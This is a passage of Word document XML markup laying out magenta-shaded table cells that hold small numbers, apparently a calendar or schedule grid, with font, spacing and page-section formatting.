            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="20"/>
              <w:jc w:val="center"/>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FF00FF"/>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FF00FF"/>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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="300" w:type="dxa"/>
            <w:gridSpan w:val="5"/>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33</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sz w:val="18"/>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8"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="2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FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="20"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="160"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="14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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="180"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="10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32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="247"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="240"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>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12</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13</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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>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26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="14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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="180"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>16</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400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00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c>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:w w:val="89"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="833" w:right="840" w:bottom="453" w:left="1420" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="0" w:equalWidth="0">
            <w:col w:w="9640"/>
          </w:cols>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="2" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="240"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="380"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="380"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="200"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="40"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="340"/>
        <w:gridCol w:w="240"/>
        <w:gridCol w:w="380"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="220"/>
        <w:gridCol w:w="180"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="380"/>
        <w:gridCol w:w="420"/>
        <w:gridCol w:w="120"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>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bookmarkStart w:id="15" w:name="page15"/>
            <w:bookmarkEnd w:id="15"/>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>4</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highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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300" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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8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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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23</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32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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2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280" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>25</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5</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38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40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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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27</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260" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>8</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8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16</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7</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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:righ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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="20"/>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380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:righ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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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220" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="20"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>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24</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4</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31</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>1</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32</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23</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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>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FF00FF"/>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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>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38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2</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11</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12</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23</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gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="1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20"/>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380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:righ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420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="120"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="20"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>1</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8</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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>18</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>33</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FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="100"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="8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33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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18</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gridSpan w:val="2"/>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2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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="160" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="10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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="300" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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38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25</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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:righ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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="220" w:type="dxa"/>
